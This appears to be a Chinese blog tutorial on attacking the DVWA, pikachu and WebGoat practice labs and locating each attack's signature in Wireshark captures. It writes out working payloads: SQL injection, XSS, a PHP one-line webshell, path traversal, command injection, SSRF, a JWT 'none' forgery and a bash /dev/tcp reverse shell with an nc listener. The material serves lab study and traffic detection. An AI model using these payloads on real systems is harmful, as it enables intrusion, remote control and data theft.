web漏洞的攻击及抓取攻击流量

以dvwa靶场为例,使用wireshark抓取攻击流量,并定位关键字段

SQL注入

攻击

在sql注入攻击

1' and 1=2 union select version(),2#

image-20231208173546486

流量特征

在数据包中可以清晰的查看源IP和目的IP

在Wireshark选中Ethernet0网卡

  • 点击Submit,进行抓包

image-20231208174703154

  • 利用union select关键字开始抓包
  • 并在Wireshark中停止抓包

image-20231208175935863

  • 抓包成功

  • 查看目的ip地址的流量

ip.dst==192.168.63.138

image-20231208180307473

  • 成功找到union select关键字

image-20231208180525316

XSS

攻击

  • 注入XSS漏洞
<ScRiPt>alert(/xss/)</script>

image-20231208181831494

  • 注入成功

image-20231208182041059

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找关键字script

image-20231208190918157

  • 成功找到script关键字

image-20231208191031126

文件上传

攻击

上传一句话木马文件

<?php @eval($_POST[777]);?>

image-20231208192850808

上传成功

image-20231208193021019

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找后缀为.php的文件

image-20231208194525270

  • 成功找到1.php关键字
  • 可以看到1.php的内容

image-20231208194923347

文件包含

攻击

将url中page后的值改为file../../../../phpinfo.php

image-20231208201025718

image-20231208200938629

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../phpinfo.php

image-20231208202214395

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

image-20231208201954039

  • 成功找到关键字file../../../../phpinfo.php

image-20231208202054120

文件读取

攻击

image-20231208204058865

将url中的值改为

file/../../../../../../../../../../windows\system32\drivers\etc\hosts

image-20231208204341899

读取成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../../../../windows\system32\drivers\etc\hosts

image-20231208205305228

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

image-20231208205627801

成功找到关键字file../../../../../../../windows\system32\drivers\etc\hosts

image-20231208205745569

暴力破解

攻击

  • 输入用户名密码

image-20231208215819863

  • 用burp抓包

image-20231208220418418

爆破成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

image-20231208221302809

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.139&&http

image-20231208221701609

成功找到数据包的关键字

image-20231208221813168

命令执行

攻击

注入命令

ping 127.0.0.1 | whoami

image-20231208223349398

注入成功

image-20231208223424048

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Submit,进行抓包

image-20231208223737950

  • 查看目的ip地址的流量
ip.dst==192.168.63.139

image-20231208224037023

成功找到数据包的关键字

image-20231208224112232

SSRF

以pikachu靶场为例

攻击

更改url后的值

image-20231208211033151

更改为http://www.baidu.com

image-20231208211215362

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为http://www.baidu.com

image-20231208211443071

成功找到数据包中的关键字

image-20231208211531348

shiro反序列化

攻击

利用kali的IP开始攻击

image-20231208115556121

成功找到cc链

image-20231208115725468

尝试命令执行

image-20231208120017735

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Ethernet0
  • 执行

image-20231208160148600

  • 开始抓取流量

  • 并在Wireshark中停止抓包

image-20231208160727542

查看目的ip地址的流量

ip.dst==192.168.63.129

image-20231208160844980

  • 双击查看

  • 看到shiro反序列化的关键字rememberme=

image-20231208161147196

jwt

以WebGoat第4关靶场为例

攻击

首先登录Tom用户

image-20231207195218312

选择一个并开始投票,发现可以一致投票

image-20231207195800014

点击删除,提示只有admin用户才能清空

image-20231207200109571

利用bp开始抓包

image-20231207200623432

右击发送到Repeater

image-20231207200831802

将cookie的值利用进行JWT解码

image-20231207201039860

image-20231207201357130

利用base64编码,将HS512改为nonefalse改为true

image-20231207201730882

image-20231207202029275

分别将修改后的base64编码放在Encoded中

image-20231207202151133

将HEADER和PAYLOAD的Encoded放在bp的cookie中

image-20231207202340734

提示已经成功完成任务

image-20231207202427904

回到页面查看,删除成功

image-20231207202653914

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

image-20231208214815104

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&http

image-20231208215030666

成功找到数据包中的关键字

image-20231208215150445

反弹shell

前提:

准备两台虚拟机(kali、linux)

攻击

首先是kali开启监听

nc -lvvp 5555

image-20231209110753977

Linux连接kali

bash -i >& /dev/tcp/192.168.63.129/5555 0>&1
          或
bash -c "bash -i >& /dev/tcp/192.168.63.129/5555 0>&1"
#bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1

image-20231209111032892

监听成功

image-20231209111102278

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包中的cat /etc/passwd

image-20231209111703129

  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&tcp
  • 成功抓到tcp数据流中的关键字

image-20231209112423626

  • 18
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值